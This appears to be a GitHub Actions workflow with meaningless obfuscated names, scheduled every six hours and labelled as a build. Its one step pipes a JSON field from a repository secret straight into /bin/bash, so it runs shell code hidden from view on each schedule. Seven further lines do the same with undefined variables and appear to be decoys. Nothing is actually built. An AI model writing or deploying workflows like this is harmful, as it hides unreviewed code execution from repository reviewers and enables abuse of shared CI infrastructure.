name: qushubin2418
on:
  workflow_dispatch:
  schedule:
    - cron: '35 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qushubin2418
        env:
          t0993: ${{ secrets.t0993 }}
        run: |
          echo $t0993 | jq -r .kxm06562 | /bin/bash
          echo $lzffs31 | jq -r .ub0 | /bin/bash
          echo $w33 | jq -r .f56 | /bin/bash
          echo $u73 | jq -r .iudro39575 | /bin/bash
          echo $aff9576 | jq -r .b90001 | /bin/bash
          echo $lmin398 | jq -r .djsi34694 | /bin/bash
          echo $zemf493 | jq -r .hx9 | /bin/bash
          echo $pa73 | jq -r .xeuy6954 | /bin/bash

